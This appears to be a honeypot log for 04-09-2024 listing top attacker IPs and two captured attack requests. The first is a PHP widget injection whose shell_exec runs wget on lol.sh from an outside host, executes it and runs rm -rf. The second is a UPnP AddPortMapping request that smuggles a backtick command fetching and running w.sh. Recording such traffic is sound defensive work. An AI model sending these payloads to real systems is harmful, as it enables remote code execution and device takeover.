Top 5 IPs for 04-09-2024 :

58.98.196.16
217.107.219.149
191.55.59.136
117.2.142.24
178.128.101.31


Malware Observed:

None observed


Commands/exploits observed :

POST /ajax/render/widget_tabbedcontainer_tab_panel%20 HTTP/1.1
Host: <Host IP>
User-Agent: Go-http-client/1.1
Content-Length: 169
Content-Type: text/plain

subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec("cd /tmp; wget http://154.216.17.208/lol.sh; chmod 777 lol.sh; sh lol.sh;rm -rf *"); exit;


POST /UD/?9 HTTP/1.1
User-Agent: luna-owns-you
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://37.221.92.196/w.sh; chmod 777 w.sh; sh w.sh; rm w.sh;`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
